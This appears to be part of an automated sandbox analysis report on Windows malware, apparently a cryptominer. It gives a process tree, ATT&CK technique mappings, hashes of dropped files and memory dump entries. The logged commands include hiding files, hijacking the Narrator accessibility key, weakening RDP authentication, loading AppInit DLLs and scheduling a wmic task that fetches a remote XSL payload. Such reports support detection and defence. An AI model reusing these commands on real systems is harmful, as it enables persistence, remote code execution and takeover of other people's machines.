C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe
5⤵
PID:2280

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight c:\users\admin\appdata\local\microsoft\onedrive\onedrivestandaloneupdater.exe
5⤵
PID:2260

C:\Windows\system32\findstr.exe
"C:\Windows\system32\findstr.exe" /i /m /c:cryptonight "c:\program files\common files\microsoft shared\clicktorun\officec2rclient.exe"
5⤵
PID:2548

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Downloader\services.exe
5⤵
- Views/modifies file attributes
PID:2948

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Connections\OSFMount.sys
5⤵
- Views/modifies file attributes
PID:3704

C:\Users\Admin\AppData\Local\Temp\mon.exe
"C:\Users\Admin\AppData\Local\Temp\mon.exe" -pSwifck
5⤵
- Executes dropped EXE
PID:2036

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\Connections\services.exe
5⤵
- Views/modifies file attributes
PID:2256

C:\Users\Admin\AppData\Local\Temp\min.exe
"C:\Users\Admin\AppData\Local\Temp\min.exe" -pSwifck
5⤵
- Executes dropped EXE
PID:2224

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Network\services.exe
5⤵
- Views/modifies file attributes
PID:1624

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
5⤵
- Views/modifies file attributes
PID:2964

C:\Users\Admin\AppData\Local\Temp\uas.exe
"C:\Users\Admin\AppData\Local\Temp\uas.exe" -pSwifcks
5⤵
- Executes dropped EXE
PID:2876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\Windows\1.bat" "
6⤵
PID:2256

C:\Windows\SysWOW64\sc.exe
sc stop ias
7⤵
PID:3744

C:\Windows\SysWOW64\sc.exe
sc delete ias
7⤵
PID:1360

C:\Windows\SysWOW64\sc.exe
sc stop FastUserSwitchingCompatibility
7⤵
PID:1316

C:\Windows\SysWOW64\sc.exe
sc delete FastUserSwitchingCompatibility
7⤵
PID:812

C:\ProgramData\Microsoft\Windows\SetACL.exe
C:\ProgramData\Microsoft\Windows\SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn setowner -ownr "n:Administrators"
7⤵
- Executes dropped EXE
PID:3604

C:\ProgramData\Microsoft\Windows\SetACL.exe
C:\ProgramData\Microsoft\Windows\SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn ace -ace "n:Administrators;p:full"
7⤵
- Executes dropped EXE
PID:2140

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" /v StartExe /t REG_EXPAND_SZ /d "C:\ProgramData\Microsoft\Windows\WER\cmd.exe" /f /reg:64
7⤵
PID:1052

C:\ProgramData\Microsoft\Windows\SetACL.exe
SetACL.exe -on "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator" -ot reg -actn ace -ace "n:Administrators;p:read"
7⤵
- Executes dropped EXE
PID:2224

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
7⤵
PID:1624

\??\c:\windows\SysWOW64\reg.exe
c:\windows\System32\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
7⤵
- Modifies registry key
PID:1828

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +a +r C:\ProgramData\Microsoft\Windows\WER\cmd.exe
7⤵
- Views/modifies file attributes
PID:3704

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +s +h +a +r c:\ProgramData\Microsoft\Windows\WER\cmd.exe
5⤵
- Views/modifies file attributes
PID:1268

C:\Users\Admin\AppData\Local\Temp\cohernece.exe
"C:\Users\Admin\AppData\Local\Temp\cohernece.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:648

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 /f /reg:64
5⤵
PID:420

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f /reg:64
5⤵
PID:2260

C:\windows\System32\reg.exe
"C:\windows\System32\reg.exe" add "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d C:\\ProgramData\\Microsoft\\Windows\\Caches\\SecureAssessmentHandlerstor.dll /f /reg:64
5⤵
PID:2088

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" sdset "Event Logs" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
PID:2880

C:\ProgramData\Microsoft\Network\Downloader\services.exe
"C:\ProgramData\Microsoft\Network\Downloader\services.exe" install "Event Logs" c:\ProgramData\Microsoft\Network\services.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2876

C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" sdset "Event Logs" D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
PID:3616

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn Microsoft\Windows\RAC\RacTaskMgr /tr "wmic os get /format:'http://cat.xiaoshabi.nl:80/net/net.xsl'" /sc minute /mo 500 /ru System /F
5⤵
- Creates scheduled task(s)
PID:2344

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:3624

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.180.0905.0007\FileSyncConfig.exe"
1⤵
- Modifies registry class
PID:3688

\??\c:\windows\syswow64\svchost.exe
c:\windows\syswow64\svchost.exe -k netsvcs -s FastUserSwitchingCompatibility
1⤵
- Loads dropped DLL
PID:2636

C:\ProgramData\Microsoft\Network\Downloader\services.exe
C:\ProgramData\Microsoft\Network\Downloader\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1360

\??\c:\ProgramData\Microsoft\Network\services.exe
"c:\ProgramData\Microsoft\Network\services.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3908

\??\c:\ProgramData\Microsoft\Network\Connections\services.exe
c:\ProgramData\Microsoft\Network\Connections\services.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Network\Connections\OSFMount.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\ProgramData\Microsoft\Network\Connections\services.exe
MD5
548f5058ff8f4fdb514ba0592cdcf344

SHA1
08abe2336a8e6031cfa72bb04607836c8f2edac6

SHA256
796b34e03468bf448fb6c77386d41ba789ec80871fe18dacaa59a3031b579822

SHA512
62af61d1f0197e3fa8cbfb33cf5b791fc010220e5d11b9ba6471d214e32fdc4d8340fa5fd25910537cc69a96bf8e6d851a1a717eef3be618b2cf0fe2fa3a4f1a

Download Submit
C:\ProgramData\Microsoft\Network\Connections\services.exe
MD5
548f5058ff8f4fdb514ba0592cdcf344

SHA1
08abe2336a8e6031cfa72bb04607836c8f2edac6

SHA256
796b34e03468bf448fb6c77386d41ba789ec80871fe18dacaa59a3031b579822

SHA512
62af61d1f0197e3fa8cbfb33cf5b791fc010220e5d11b9ba6471d214e32fdc4d8340fa5fd25910537cc69a96bf8e6d851a1a717eef3be618b2cf0fe2fa3a4f1a

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\services.exe
MD5
31cbc246c3fbceee92ee42261257c0aa

SHA1
92ab05a2ef44111341720eb92aaab9051dc9aa0c

SHA256
2211bbe75be4866ebc40a78184e8dd28dadc4fe7c9d33a91a97fc30236425075

SHA512
d956146efcf4fb8c8d143dc0a158882ef162ac605157e19b52e2cee88b4595d7cae1e86306ce6d16a1b3359e2b0b5d3ae5a1ee5a802e3e0d18b2011ef7ed5b03

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\services.exe
MD5
31cbc246c3fbceee92ee42261257c0aa

SHA1
92ab05a2ef44111341720eb92aaab9051dc9aa0c

SHA256
2211bbe75be4866ebc40a78184e8dd28dadc4fe7c9d33a91a97fc30236425075

SHA512
d956146efcf4fb8c8d143dc0a158882ef162ac605157e19b52e2cee88b4595d7cae1e86306ce6d16a1b3359e2b0b5d3ae5a1ee5a802e3e0d18b2011ef7ed5b03

Download Submit
C:\ProgramData\Microsoft\Network\Downloader\services.exe
MD5
31cbc246c3fbceee92ee42261257c0aa

SHA1
92ab05a2ef44111341720eb92aaab9051dc9aa0c

SHA256
2211bbe75be4866ebc40a78184e8dd28dadc4fe7c9d33a91a97fc30236425075

SHA512
d956146efcf4fb8c8d143dc0a158882ef162ac605157e19b52e2cee88b4595d7cae1e86306ce6d16a1b3359e2b0b5d3ae5a1ee5a802e3e0d18b2011ef7ed5b03

Download Submit
C:\ProgramData\Microsoft\Network\services.exe
MD5
d197c48ba18873bcc9156a44f6cfedd2

SHA1
23acc3c77beb3f9fba4eb33755a965e172caa93a

SHA256
02ff13a1315028d6e7a55e9dd5ac27354a601cc98ec40c7be593f7ca4066b681

SHA512
d460e59034cd1d27419c450d5260aeda349e59f50d888da1a7db914a2eb1f63c1747d8ecea587b4534639127a0a890b4868dfa0b23f8057442f8c079cf74df9b

Download Submit
C:\ProgramData\Microsoft\Network\services.exe
MD5
d197c48ba18873bcc9156a44f6cfedd2

SHA1
23acc3c77beb3f9fba4eb33755a965e172caa93a

SHA256
02ff13a1315028d6e7a55e9dd5ac27354a601cc98ec40c7be593f7ca4066b681

SHA512
d460e59034cd1d27419c450d5260aeda349e59f50d888da1a7db914a2eb1f63c1747d8ecea587b4534639127a0a890b4868dfa0b23f8057442f8c079cf74df9b

Download Submit
C:\ProgramData\Microsoft\Windows\1.bat
MD5
e9d5ac6c7c818af1e2c9a0fda10b9f82

SHA1
19a2e762abafbca818f85510b386baddcd910ffa

SHA256
1d7eeeecf9c4fe375f05233554f0597e2d3602997a7a59f3fd6b71ec401ea12d

SHA512
4424dae9f1912e0206ba4d830395f8c710911938cdf4ccc4557bda361cd67efa8ebb917024c5289af859850bcdc622a4d2d331163eb45c272fd48d50ebcf5118

Download Submit
C:\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
MD5
9be14da13af02ef784fa043e7dc6a575

SHA1
5b2a455d3f6c8fec0d0dbdb05c1c225acdbd7fe7

SHA256
283a3e1ed9fee62c255a1545c48d766eed792bb9401e26afc41e06d96bfd6d09

SHA512
6d78bf2ada3dbca9128abde067fd343a68e869f784fa7237bfb1982f27fbf094f758a53244bead92d9b5d81509f05ad03b9bb34bd8b3d03266df281563eb7f03

Download Submit
C:\ProgramData\Microsoft\Windows\SetACL.exe
MD5
bd65c1c20b16d028b8fac6496277a165

SHA1
6344888b7e8445616b909c2eb0bd5820cf3ea386

SHA256
3572ea81d589905b2842872638c1eeea28761ef25c4ef6e5386d1c4ae4d0b721

SHA512
c0057e331804031d2577b05873203ff23e566df1d662999cff9bdc1cddcd11c20f5a75b6332f3a0791dadb1c821b3230f01b83e203572cdfb07fe3368d3a89ca

Download Submit
C:\ProgramData\Microsoft\Windows\SetACL.exe
MD5
bd65c1c20b16d028b8fac6496277a165

SHA1
6344888b7e8445616b909c2eb0bd5820cf3ea386

SHA256
3572ea81d589905b2842872638c1eeea28761ef25c4ef6e5386d1c4ae4d0b721

SHA512
c0057e331804031d2577b05873203ff23e566df1d662999cff9bdc1cddcd11c20f5a75b6332f3a0791dadb1c821b3230f01b83e203572cdfb07fe3368d3a89ca

Download Submit
C:\ProgramData\Microsoft\Windows\SetACL.exe
MD5
bd65c1c20b16d028b8fac6496277a165

SHA1
6344888b7e8445616b909c2eb0bd5820cf3ea386

SHA256
3572ea81d589905b2842872638c1eeea28761ef25c4ef6e5386d1c4ae4d0b721

SHA512
c0057e331804031d2577b05873203ff23e566df1d662999cff9bdc1cddcd11c20f5a75b6332f3a0791dadb1c821b3230f01b83e203572cdfb07fe3368d3a89ca

Download Submit
C:\ProgramData\Microsoft\Windows\SetACL.exe
MD5
bd65c1c20b16d028b8fac6496277a165

SHA1
6344888b7e8445616b909c2eb0bd5820cf3ea386

SHA256
3572ea81d589905b2842872638c1eeea28761ef25c4ef6e5386d1c4ae4d0b721

SHA512
c0057e331804031d2577b05873203ff23e566df1d662999cff9bdc1cddcd11c20f5a75b6332f3a0791dadb1c821b3230f01b83e203572cdfb07fe3368d3a89ca

Download Submit
C:\ProgramData\Microsoft\Windows\WER\cmd.exe
MD5
255093f22b1f705a1f22db32b2a030b0

SHA1
62706fc896a54de5273aeecbadbe70e36fe53433

SHA256
7c7ac93c8f033c3fd81f24f3283671b8debffc669011e6bf254890d4db8e83f5

SHA512
bb53f89f23b49f291586927b755a7f2529f585685c6539336e81046bc78f5d545f05a2977bb41ad4133e55c327c9fcc90fbf3dbfc29432308b2bb43f29adf10e

Download Submit
C:\ProgramData\Microsoft\Windows\uas.exe
MD5
255093f22b1f705a1f22db32b2a030b0

SHA1
62706fc896a54de5273aeecbadbe70e36fe53433

SHA256
7c7ac93c8f033c3fd81f24f3283671b8debffc669011e6bf254890d4db8e83f5

SHA512
bb53f89f23b49f291586927b755a7f2529f585685c6539336e81046bc78f5d545f05a2977bb41ad4133e55c327c9fcc90fbf3dbfc29432308b2bb43f29adf10e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4FF1.tmp
MD5
6c9af7ab01d69ab35541605547df33b8

SHA1
febfb6043085647e3cfe7357ac26414c247e7c24

SHA256
42c00d87cd1c22f34af9deea9c0d86b3d1f157db5989053f59f81b1a6e3162cf

SHA512
bd447a30ab3cd7fb85c1a50af090e3a8a866019031b7d75710c3c8373e3cf45c453bbe22a7917443a3bedbba542adcd56dd1edb60f68b4c93fc9ee3e23bcfa9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cohernece.exe
MD5
f0637994f3336eb8d44b45415435022c

SHA1
d7a2fec1f98c653c96c797d51aee269866a31daa

SHA256
f55fb3ca7a43327157b2862390290c3df7ddf84b891f856ae720ff8a4e198b31

SHA512
88fa49c7122737e0ead2fb809211209698b38fdce5bacbbf4b64cc9f9944b053a5326b248780e81ea18d548ae5097aed5febf64c0b818a7b558644b81670b6f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cohernece.exe
MD5
f0637994f3336eb8d44b45415435022c

SHA1
d7a2fec1f98c653c96c797d51aee269866a31daa

SHA256
f55fb3ca7a43327157b2862390290c3df7ddf84b891f856ae720ff8a4e198b31

SHA512
88fa49c7122737e0ead2fb809211209698b38fdce5bacbbf4b64cc9f9944b053a5326b248780e81ea18d548ae5097aed5febf64c0b818a7b558644b81670b6f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\d4sp5b5c\d4sp5b5c.dll
MD5
c4c610f68c913a57d5a24644bea31db5

SHA1
85ac8518c4e76770c02fb3225031f91114b1e107

SHA256
78eaee2e76f080b2c4a3950cd18464283e80a15c944e1233a95d481563137336

SHA512
ce3990d10ce437854bf6f441effb49428273a7834ba2aae37d974e9887bee03ad66caa91ca2695170bd3313dc273bbf0d74094f3e8809880a1dfe6cd6d97c90c

Download Submit
C:\Users\Admin\AppData\Local\Temp\min.exe
MD5
8630e544d640c391f1eb5214d59a5dad

SHA1
fa92256bda5fa0f483cb6f893ae64a3b30396bb9

SHA256
848e30e846a348ed327dfaf2f88fa9fdab1712099715570a87f64f6b76c039e3

SHA512
9e6de61ff37174e129d5efcdc39dc2f1fe8a2469c79c7564e45f722e5cb3a147a7c735351884526168e9e5220dbc70234348e221a7f1d3b88add9c2c0a1f7044

Download Submit
C:\Users\Admin\AppData\Local\Temp\min.exe
MD5
8630e544d640c391f1eb5214d59a5dad

SHA1
fa92256bda5fa0f483cb6f893ae64a3b30396bb9

SHA256
848e30e846a348ed327dfaf2f88fa9fdab1712099715570a87f64f6b76c039e3

SHA512
9e6de61ff37174e129d5efcdc39dc2f1fe8a2469c79c7564e45f722e5cb3a147a7c735351884526168e9e5220dbc70234348e221a7f1d3b88add9c2c0a1f7044

Download Submit
C:\Users\Admin\AppData\Local\Temp\mon.exe
MD5
7e947f19f7299a859c68258677aabf78

SHA1
95031ffb78bf0065e326074722820d98530c53a7

SHA256
6975ef106a810d85e19d71a4daca4a2f5f6cf4ef9633e38da016404726a34a23

SHA512
e5b2849d18345ae7e7f2a1938dca640135fd268606b7bc26a50980a559463152d1504a8ebfff2f47ff9b572aed0771531ffc538042351831ea8750f31c8b649c

Download Submit
C:\Users\Admin\AppData\Local\Temp\mon.exe
MD5
7e947f19f7299a859c68258677aabf78

SHA1
95031ffb78bf0065e326074722820d98530c53a7

SHA256
6975ef106a810d85e19d71a4daca4a2f5f6cf4ef9633e38da016404726a34a23

SHA512
e5b2849d18345ae7e7f2a1938dca640135fd268606b7bc26a50980a559463152d1504a8ebfff2f47ff9b572aed0771531ffc538042351831ea8750f31c8b649c

Download Submit
C:\Users\Admin\AppData\Local\Temp\uas.exe
MD5
6ef8ff0f8a2f9b2d7ce636fbb16c43fe

SHA1
51736b2ca19dce41699bbe6b27060e524faf4258

SHA256
4fedc349635aeb7a518b0c708202bec94f583d1e01dbf645e452f81816774656

SHA512
337fefb026c8a65d1169f8ac06e360d8773dc0cd921eaaaca3226c67e9789a6d22d171cbc52b14db3329a05b09140c44fb6a2f2546f3af844cc656daf9d356f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\uas.exe
MD5
6ef8ff0f8a2f9b2d7ce636fbb16c43fe

SHA1
51736b2ca19dce41699bbe6b27060e524faf4258

SHA256
4fedc349635aeb7a518b0c708202bec94f583d1e01dbf645e452f81816774656

SHA512
337fefb026c8a65d1169f8ac06e360d8773dc0cd921eaaaca3226c67e9789a6d22d171cbc52b14db3329a05b09140c44fb6a2f2546f3af844cc656daf9d356f5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d4sp5b5c\CSC55B12A18C17D4C508FCAA0AB49F169B5.TMP
MD5
3cc334c1846f40c7fb18fc5476b2e1e4

SHA1
04460e9819e43292dca79df1a736f8b403f33ada

SHA256
0643216ddd7870fa17cd2f76f2c1d096414c86fa568904213caa100c4fb3409f

SHA512
7511065b333b2a0bffab3a91cb1266cca7bfc71c7c2fae1113149349d430d83b6f3aa1a9910f6e2d5e06a2467c022a3c3665a54ea0e94bf7789662177e6ecb06

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d4sp5b5c\d4sp5b5c.0.cs
MD5
b429acd06f2b7ecfba004b883016110a

SHA1
27c513d4fed6ac4850dab34ca960d326c00685e1

SHA256
0f10ea6c49f7fc90b718cc58763d770ed936abf5da4e0e49cfc040ff094d3f8d

SHA512
5fab4436371f25dfa8880393cdcec61b60a86294c64b689d4056d8b0e501b94c6049979d7a67fee46a9241746bbc60437e5cb522088072ab92d01df34b94be37

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\d4sp5b5c\d4sp5b5c.cmdline
MD5
6d6c6652f90c887ff1423c0df395623b

SHA1
189b546e1e08d9b6d962695d42df0d42c38c069e

SHA256
f43d0e5013128326160e43e2cc9ae1cd9deb5a11fa9bdd64d46256183aedb875

SHA512
8cd320c7504a3b1905746889b321b3883304cbee0d30aa62d063680843e1e5fea147c585368e5093a99425bcd1a05c3c444219ce4ff5d4f380463b6350b5a055

Download Submit
\??\c:\windows\SysWOW64\fastuserswitchingcompatibilityex.dll
MD5
90a4eeaf9042052ccee89c03d5f6b807

SHA1
b874cdbfb11ab9ec0e933eae668a3055fc9438ae

SHA256
f7c4b74c91a692b2b7922ec259a7a9ffbe066720e88cd954c164b7da06a46259

SHA512
1d19454623e282d2d338ab6a2a93c56569bec7c91d3f2fa39acd59ebf39af169ebc044093d1465dac2ec2b80d157987386d932f9cc6db91933236f31e2ab5ec1

Download Submit
\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
MD5
9be14da13af02ef784fa043e7dc6a575

SHA1
5b2a455d3f6c8fec0d0dbdb05c1c225acdbd7fe7

SHA256
283a3e1ed9fee62c255a1545c48d766eed792bb9401e26afc41e06d96bfd6d09

SHA512
6d78bf2ada3dbca9128abde067fd343a68e869f784fa7237bfb1982f27fbf094f758a53244bead92d9b5d81509f05ad03b9bb34bd8b3d03266df281563eb7f03

Download Submit
\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
MD5
9be14da13af02ef784fa043e7dc6a575

SHA1
5b2a455d3f6c8fec0d0dbdb05c1c225acdbd7fe7

SHA256
283a3e1ed9fee62c255a1545c48d766eed792bb9401e26afc41e06d96bfd6d09

SHA512
6d78bf2ada3dbca9128abde067fd343a68e869f784fa7237bfb1982f27fbf094f758a53244bead92d9b5d81509f05ad03b9bb34bd8b3d03266df281563eb7f03

Download Submit
\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
MD5
9be14da13af02ef784fa043e7dc6a575

SHA1
5b2a455d3f6c8fec0d0dbdb05c1c225acdbd7fe7

SHA256
283a3e1ed9fee62c255a1545c48d766eed792bb9401e26afc41e06d96bfd6d09

SHA512
6d78bf2ada3dbca9128abde067fd343a68e869f784fa7237bfb1982f27fbf094f758a53244bead92d9b5d81509f05ad03b9bb34bd8b3d03266df281563eb7f03

Download Submit
\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
MD5
9be14da13af02ef784fa043e7dc6a575

SHA1
5b2a455d3f6c8fec0d0dbdb05c1c225acdbd7fe7

SHA256
283a3e1ed9fee62c255a1545c48d766eed792bb9401e26afc41e06d96bfd6d09

SHA512
6d78bf2ada3dbca9128abde067fd343a68e869f784fa7237bfb1982f27fbf094f758a53244bead92d9b5d81509f05ad03b9bb34bd8b3d03266df281563eb7f03

Download Submit
\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
MD5
9be14da13af02ef784fa043e7dc6a575

SHA1
5b2a455d3f6c8fec0d0dbdb05c1c225acdbd7fe7

SHA256
283a3e1ed9fee62c255a1545c48d766eed792bb9401e26afc41e06d96bfd6d09

SHA512
6d78bf2ada3dbca9128abde067fd343a68e869f784fa7237bfb1982f27fbf094f758a53244bead92d9b5d81509f05ad03b9bb34bd8b3d03266df281563eb7f03

Download Submit
\ProgramData\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll
MD5
9be14da13af02ef784fa043e7dc6a575

SHA1
5b2a455d3f6c8fec0d0dbdb05c1c225acdbd7fe7

SHA256
283a3e1ed9fee62c255a1545c48d766eed792bb9401e26afc41e06d96bfd6d09

SHA512
6d78bf2ada3dbca9128abde067fd343a68e869f784fa7237bfb1982f27fbf094f758a53244bead92d9b5d81509f05ad03b9bb34bd8b3d03266df281563eb7f03

Download Submit
\Windows\SysWOW64\FastUserSwitchingCompatibilityex.dll
MD5
90a4eeaf9042052ccee89c03d5f6b807

SHA1
b874cdbfb11ab9ec0e933eae668a3055fc9438ae

SHA256
f7c4b74c91a692b2b7922ec259a7a9ffbe066720e88cd954c164b7da06a46259

SHA512
1d19454623e282d2d338ab6a2a93c56569bec7c91d3f2fa39acd59ebf39af169ebc044093d1465dac2ec2b80d157987386d932f9cc6db91933236f31e2ab5ec1

Download Submit
memory/420-285-0x0000000000000000-mapping.dmp

Download
memory/648-282-0x0000000000000000-mapping.dmp

Download
memory/812-265-0x0000000000000000-mapping.dmp

Download
memory/1008-138-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-134-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-188-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-173-0x000001D4B0FD0000-0x000001D4B0FD1000-memory.dmp

Filesize
4KB

Download
memory/1008-117-0x0000000000000000-mapping.dmp

Download
memory/1008-118-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-156-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-155-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-197-0x000001D4B0230000-0x000001D4B0232000-memory.dmp

Filesize
8KB

Download
memory/1008-119-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-199-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-729-0x000001D4B0279000-0x000001D4B027F000-memory.dmp

Filesize
24KB

Download
memory/1008-120-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-147-0x000001D4B0278000-0x000001D4B0279000-memory.dmp

Filesize
4KB

Download
memory/1008-140-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-121-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-139-0x000001D4B0276000-0x000001D4B0278000-memory.dmp

Filesize
8KB

Download
memory/1008-122-0x000001D4B0310000-0x000001D4B0311000-memory.dmp

Filesize
4KB

Download
memory/1008-123-0x000001D497DA0000-0x000001D497DA1000-memory.dmp

Filesize
4KB

Download
memory/1008-189-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-133-0x000001D4B0273000-0x000001D4B0275000-memory.dmp

Filesize
8KB

Download
memory/1008-132-0x000001D4B0270000-0x000001D4B0272000-memory.dmp

Filesize
8KB

Download
memory/1008-131-0x000001D4B0F50000-0x000001D4B0F51000-memory.dmp

Filesize
4KB

Download
memory/1008-124-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-129-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-130-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-126-0x000001D497DF0000-0x000001D497DF1000-memory.dmp

Filesize
4KB

Download
memory/1008-127-0x000001D4961C0000-0x000001D4961C2000-memory.dmp

Filesize
8KB

Download
memory/1008-125-0x000001D4B0E40000-0x000001D4B0E41000-memory.dmp

Filesize
4KB

Download
memory/1012-193-0x0000000000000000-mapping.dmp

Download
memory/1052-272-0x0000000000000000-mapping.dmp

Download
memory/1080-217-0x0000000000000000-mapping.dmp

Download
memory/1080-168-0x0000000000000000-mapping.dmp

Download
memory/1268-279-0x0000000000000000-mapping.dmp

Download
memory/1312-115-0x0000000000000000-mapping.dmp

Download
memory/1316-264-0x0000000000000000-mapping.dmp

Download
memory/1360-263-0x0000000000000000-mapping.dmp

Download
memory/1572-151-0x0000000000000000-mapping.dmp

Download
memory/1624-275-0x0000000000000000-mapping.dmp

Download
memory/1624-251-0x0000000000000000-mapping.dmp

Download
memory/1796-164-0x0000000000000000-mapping.dmp

Download
memory/1812-116-0x0000000000000000-mapping.dmp

Download
